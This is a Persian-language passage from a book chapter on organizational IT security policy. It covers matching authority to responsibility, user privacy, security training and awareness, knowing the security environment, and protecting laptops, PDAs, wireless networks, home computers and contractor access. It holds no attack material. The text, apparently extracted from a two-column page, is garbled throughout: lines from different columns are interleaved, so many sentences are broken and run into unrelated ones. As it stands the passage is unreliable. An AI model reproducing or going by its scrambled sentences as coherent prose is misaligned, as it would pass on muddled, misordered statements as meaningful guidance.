‫ﺑﺎﺷﻨﺪ ﺑﺠﺎﻱ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻋﺼﺮ ﻫﺮ ﺭﻭﺯ ﻭ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔـﺮﺩﻥ ﺩﻳﮕـﺮﺍﻥ ﺑﻴﻨﺪﺍﺯﻳـﺪ؛ ﻭ‬
‫ﺗﻌﻄﻴﻼﺕ ﺁﺧﺮ ﻫﻔﺘـﻪ ﺭﺍ ﺑـﺎ ﺧـﺎﻧﻮﺍﺩﻩﻫﺎﻳـﺸﺎﻥ ﺳـﭙﺮﻱ ﻛﻨﻨـﺪ‪ ،‬ﺍﺯ‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻧﻨﻤﺎﻳﻴﺪ‪ .‬ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺍﻭﻗـﺎﺕ ﺑـﺪﻱ‬
‫ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﺧﺮﺳﻨﺪﺗﺮ ﻭ ﺭﺍﺿﻲﺗﺮ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ!‬
‫ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺗﻮﺯﻳﻊ ﻛﻨﻴـﺪ‪ .‬ﻳـﻚ ﺍﺻـﻞ ﺩﺭ‬
‫ﻭﻗﺘﻲ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ‪ ،‬ﻫﻤﻮﺍﺭﻩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺫﻫـﻦ‬
‫ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﻣﻲﮔﻮﻳﺪ‪:‬‬
‫ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺁﻧﻬﺎ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﻜﺎﺕ‪ ،‬ﺗﻌﺒﻴـ ﹺﺮ‬
‫ﺍﮔﺮ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻣﻨﻴﺖ ﺩﺍﺭﻳـﺪ ﻭﻟـﻲ ﺍﺧﺘﻴـﺎﺭﻱ ﺑـﺮﺍﻱ‬ ‫ﻧﺎﺩﺭﺳﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺳﻴﺎﺳﺖ ﺷﻤﺎ ﻧﺒﺎﻳﺪ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﺗﻨﺒﻴﻪ ﻣﺘﺨﻠﻔﻴﻦ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﻧﺸﺪﻩ ﺍﺳﺖ‪ ،‬ﻫﻨﮕـﺎﻡ‬ ‫ﺍﺷﺘﺒﺎﻩ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺁﻧﺎﻥ ﺭﺍ ﻣﺴﺘﺤﻖ ﻫﺮ ﻣﺠﺎﺯﺍﺗﻲ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﻭﻗﻮﻉ ﻳـﻚ ﻣـﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﻳـﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﺳـﺮﺯﻧﺶ‬ ‫ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜـﻦ‬
‫ﻣﻲﺷﻮﻳﺪ‪.‬‬ ‫ﺍﺳﺖ ﺷـﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﺎﺷـﻨﺪ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻫﺮ ﭼﻨﺪ ﺍﺻﻞ ﺑﺎﻻ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣـﺎ ﻣـﺴﺌﻮﻟﻴﺖ‬ ‫ﺑﺨﻮﺍﻫﻨﺪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺧﺼﻮﺻﻲ ﻧﮕﻬﺪﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻭﺍﻗﻌﻲ ﻣﺘﻮﺟﻪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷـﺎﻣﻞ ﻧﺎﻣـﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺗﻮﺯﻳﻊ ﻧﻜﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺳﻮﺍﺑﻖ ﺷﺨﺼﻲ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻴﻬﺎﻱ ﺷﻐﻠﻲ ﺑﺎﺷﺪ‪ .‬ﭘﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻫﺮﭼﻨـﺪ ﺷـﺎﻳﺪ ﻧﺘﻮﺍﻧﻴـﺪ‬
‫ﺍﻳﻦ ﺑﺨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺍﺳـﺖ‬
‫ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻴﺪ‪ .‬ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜـﻪ ﺍﺯ‬
‫ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﻋﻮﺍﻣﻞ ﻣﻬﻢ‬
‫ﻧﻴﺎﺯﻫﺎ ﻭ ﺍﺣﺴﺎﺳﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﻏﺎﻓﻞ ﻧﺸﻮﻳﺪ‪.‬‬
‫ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺷﺎﻣﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺁﮔـﺎﻫﻲ‪ ،‬ﺁﻣـﻮﺯﺵ ﻭ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﻃﺮﺡ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪.‬‬
‫ﺑﺮ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﺗﻤﺮﻛﺰ ﻛﻨﻴﺪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ‬ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺁﻣـﻮﺯﺵ ﻭ ﺑـﺎﺯﺁﻣﻮﺯﻱ ﻛﻠﻴـﺔ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻫﺮ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ ﺍﻭﻟﻴـﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺎﺳﺖ ﺧﻮﺩ ﺭﺍ ﺗﺪﻭﻳﻦ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺍﻣﻨﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻥ ﻣﻄﺎﻟﺐ ﺑﺎﻳﺪ ﺩﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﻭ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺷﺒﻜﻪ ﻫﺎ‪ ،‬ﻛﺎﺭﻛﻨـﺎﻥ ﻭ‬
‫ﻗﺎﻟﺐ ﻣﺸﺨﺺ ﺑﺮﺍﻱ ﻭﻱ ﻳﺎﺩﺁﻭﺭﻱ ﺷﻮﻧﺪ )ﺣﺘﻲ ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﻳـﺎﺩﺁﻭﺭﻱ‬
‫ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺤـﻴﻂ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺎﺷـﺪ!(‪ .‬ﺍﺣﺘﻤـﺎﻝ‬
‫ﻣﻲﺷﻨﺎﺳﻴﺪ ﻭ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ‪ .‬ﺍﻳﻦ ﺷﻨﺎﺧﺖ‪ ،‬ﺁﻧﭽـﻪ‬
‫ﮔﺮﻓﺘﺎﺭﺷــﺪﻥ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﻣــﻮﺯﺵﺩﻳــﺪﻩ ﺩﺭ ﺗﺮﻓﻨــﺪﻫﺎ ﻭ ﺧــﺼﻮﺻﹰﺎ‬
‫ﺑﺎﻋﺚ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎﺳﺖ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣـﻲﻛﻨـﺪ‪ .‬ﻭﻗﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ‬
‫ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻛﻤﺘﺮ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺗﺪﻭﻳﻦ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭼﺮﺍ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺩﺭ ﻣﺤﻴﻂ ﺷﻤﺎﺳﺖ ﻭ ﻳﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺤﻴﻂ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑـﺎ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ‪ ،‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ‬
‫ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺷﻤﺎ ﺗﻌﺎﻣﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺭﺍ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻧﺪﺍﺧﺘﻪﺍﻳـﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﻛﻨﻨﺪ ﻭ ﻫﺮﻳﻚ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻫﻤﺎﻥ ﻣﺮﺯﻫﺎﻱ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﻫـﺎ‬ ‫ﻳﻚ ﺑﺨﺶ ﺣﻴﺎﺗﻲ ﻫﺮ ﺳﻴﺴﺘ ﹺﻢ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﻋﻄﺎﻱ ﺯﻣـﺎﻥ ﻭ ﻓـﺮﺍﻫﻢ‬
‫ﻭ ﻧﺮﺩﻩﻫﺎ ﺗﻌﺮﻳﻒ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﻣﺤﻴﻄﻬـﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ‬ ‫ﻛﺮﺩﻥ ﭘﺸﺘﻴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺤﺼﻴﻞ ﻭ ﺁﻣﻮﺯﺵ ﺑﻴﺸﺘﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺍﺳـﺖ‪.‬‬
‫‪١٥٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﺤﻮﻃﻪ ﺑﺒﺮﺩ‪ ،‬ﺑﺎ ﭼﻪ ﺭﻭﺷـﻬﺎﻳﻲ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺑﻨﺪﺭﺕ ﺍﻳﻨﻘﺪﺭ ﺍﻳﺴﺘﺎ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ )ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺷﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﻣـﻲﺷـﻮﺩ( ﻭ‬ ‫ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺑﺎﻳﺪ ﻧﻜﺎﺗﻲ ﻣﺜـﻞ ﻣـﻮﺍﺭﺩ ﺯﻳـﺮ ﺭﺍ‬
‫ﺍﮔﺮ ﺁﻥ ﺭﺳﺎﻧﻪ ﺩﺯﺩﻳﺪﻩ ﻳﺎ ﮔـﻢ ﺷـﻮﺩ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ‬ ‫ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺸﺮﻭﺡ ﺑﻴﺎﻥ ﺷـﻮﺩ‬
‫ﻼ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳـﺪ‬‫ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﻗﺒ ﹰ‬ ‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﺯ ﻣﻮﻗﻌﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺧــﻮﺩ ﺩﻭﺭ ﻫــﺴﺘﻴﺪ‬ ‫•‬

‫ﺍﺯ ﺑـﻴﻦ ﺑـﺮﻭﺩ ﺗـﺎ ﺍﺣﺘﻤـﺎﻝ ﺧﻄﺮﻫـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺍﻓــﺸﺎﻱ‬ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻥ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‪.‬‬ ‫ﺣﻤﻞ ﻭ ‪PDA‬ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﻣﺜﻞ ﺁﺩﺭﺳﻬﺎﻱ ‪ ،IP‬ﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﻠﻔﻦ‬
‫ﻭ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺮﺍﻱ ﭘﺮﺳﺸﻬﺎﻱ ﺯﻳﺮ ﭘﺎﺳـﺨﻬﺎﻱ ﻣﻨﺎﺳـﺒﻲ ﺩﺍﺷـﺘﻪ‬ ‫ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻨﺪ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺑﺎﺷﻴﺪ‪:‬‬ ‫ﻼ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﺷـﻨﺪ؛ ﻣـﺜ ﹰ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻛﺪﺍﻡ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻛﺴﺎﻧﻲ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﻛـﻪ ‪PDA‬ﻫـﺎ ﻭ‬ ‫•‬
‫ﻓﻴﺰﻳﻜﻲ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺧﻄـﺮﺍﺕ ﺩﺯﺩﻱ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻣﻼﻗﺎﺗﻬـﺎ ﻭ ﻳـﺎ ﺻـﺮﻓﹰﺎ ﺩﺭ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺁﮔﺎﻩ ﻭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﺎﺯﺩﻳﺪﻫﺎ ﺑﻪ ﻣﺤﻞ ﻛﺎﺭ ﻣﻲﺁﻭﺭﻧﺪ؟ ﺿﻮﺍﺑﻂ ﺍﺗﺼﺎﻝ ﺁﻧﻬﺎ ﺑـﻪ‬
‫ﺷﺒﻜﻪﻫﺎ‪ ،‬ﺧﻄﻮﻁ ﺗﻠﻔﻦ‪ ،‬ﭼﺎﭘﮕﺮﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺤﻞ‬ ‫•‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬


‫ﻛﺎﺭ ﭼﻴﺴﺘﻨﺪ؟‬ ‫ﻣﻲﮔﻴﺮﻧﺪ ﻳﺎ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺎﻳﺖ ﻣﺘـﺼﻞ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﭼﻪ ﻣﻼﺣﻈﺎﺗﻲ ﺑﺮﺍﻱ ﺣﻤﻞ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﺫﺧﻴـﺮﺓ‬ ‫•‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﻳﺎ ﭘﺎﺭﻙ ﻛـﺮﺩﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻛﺎﺭ )ﻣﺜ ﹰﻼ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ( ﺍﺗﺨﺎﺫ‬ ‫ﻳﻚ ﻣﺎﺷﻴﻦ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟ ﺍﮔﺮ ﺭﻭﻱ ﺩﻳﺴﻜﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻭﺟـﻮﺩ‬ ‫ﻛﻴﻔﻲ ﺩﺭ ﺩﺍﺧﻞ ﻣﺎﺷﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﭼﻪ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺟﺎﺭﻩﺍﻱ‬ ‫ﺑﮕﻴﺮﻧﺪ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﻃـﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ‬
‫ﻛﻪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺻﺎﺣﺒﺎﻧﺸﺎﻥ ﻋـﻮﺩﺕ ﺩﺍﺩﻩ ﻣـﻲﺷـﻮﻧﺪ ﭼـﻪ‬ ‫ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ ﺁﻧﻬـﺎ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺭﺍﻫﺒﺮﺩﻱ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺍﺳﺖ؟‬ ‫ﺳﺎﻳﺖ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﻨﺪ ﻭ ﺍﺯ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ‬
‫ﻣﺨﺮﺏ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﮔﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺷﺮﻛﺎﻱ ﺗﺠـﺎﺭﻱ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ ﺑـﻪ ﻭﺳـﺎﻳﻞ ﺷـﻤﺎ‬ ‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ‪ -‬ﺧﻮﺍﻩ ﺩﺭ ﻣﺤـﻞ ﻛـﺎﺭ ﺷـﻤﺎ ﻳـﺎ‬ ‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻨﺎﺯﻝ ﻣـﻮﺭﺩ‬ ‫•‬
‫ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩﺷﺎﻥ ‪ -‬ﭼﻪ ﻛـﺴﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺣﻔﺎﻇـﺖ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﻣﻌـﺮﺽ ﺧﻄـﺮ‬
‫ﺧﻮﺍﻫﺪ ﻛـﺮﺩ؟ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺧـﺘﻼﻁ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺩﺍﺩﻩﻫـﺎﻱ‬ ‫ﻧﻔﻮﺫ‪ ،‬ﺩﺯﺩﻱ‪ ،‬ﻭ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨـﺮﺏ ﺑﺎﺷـﻨﺪ ﻭ‬
‫ﺣﺴﺎﺱ ﺧﻮﺩ ﺑﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ؟‬ ‫ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺧﻼﻑ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ )ﻣﺜ ﹰ‬
‫ﻼ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳـﻚ ﺗﺠـﺎﺭﺕ‬
